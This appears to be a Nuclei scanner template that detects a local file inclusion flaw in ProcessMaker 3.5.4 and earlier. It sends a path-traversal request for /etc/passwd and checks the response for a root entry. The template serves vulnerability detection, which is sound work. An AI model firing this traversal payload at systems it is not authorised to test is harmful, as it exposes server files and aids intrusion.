id: processmaker-lfi

info:
  name: ProcessMaker <=3.5.4 - Local File Inclusion
  author: KrE80r
  severity: high
  description: ProcessMaker 3.5.4 and prior is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/50229
    - https://www.processmaker.com
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 2
  tags: processmaker,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        part: body
        words:
          - "ProcessMaker"
          - "processmaker_login.png"
        condition: and

  - raw:
      - |
        GET /../../../..//etc/passwd HTTP/1.1
        Host: {{Hostname}}

    unsafe: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# digest: 4a0a0047304502205881b06ab3cf04ca7f9a3d37c064c364a411ddea6a2db693857ca2e104a761f50221009b673896ede24406cb4290e2ddf260ca6e943b1d5dfa1fa8273015cfd15089bc:922c64590222798bb761d5b6d8e72950
